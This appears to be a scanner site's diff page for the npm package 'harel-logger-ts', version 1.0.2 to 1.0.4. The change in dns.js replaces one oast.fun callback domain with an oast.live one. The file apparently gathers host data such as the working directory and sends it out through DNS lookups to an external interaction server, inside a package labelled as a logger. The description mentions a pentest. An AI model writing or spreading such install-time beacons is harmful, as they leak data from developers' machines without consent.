harel-logger-ts 1.0.2 → 1.0.4

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/dns.js +1 -1
  2. package/package.json +1 -1
package/dns.js CHANGED
@@ -2,7 +2,7 @@ var os = require("os");
2
2
  const dns = require('dns');
3
3
 
4
4
  const characters ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
5
- const baseurl = ".cdpq1nhbn6qs73dtmr5gh1f7ow5ad6xqa.oast.fun"
5
+ const baseurl = ".cdqvfm9bn6qs73c7o4bg4bseqfys5fuzd.oast.live"
6
6
  const id = generateString(3) + "."
7
7
  const npmpkg = "harel-logger-ts"
8
8
  const path = process.cwd().toString();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "harel-logger-ts",
3
- "version": "1.0.2",
3
+ "version": "1.0.4",
4
4
  "description": "varte pt test",
5
5
  "main": "app.js",
6
6
  "scripts": {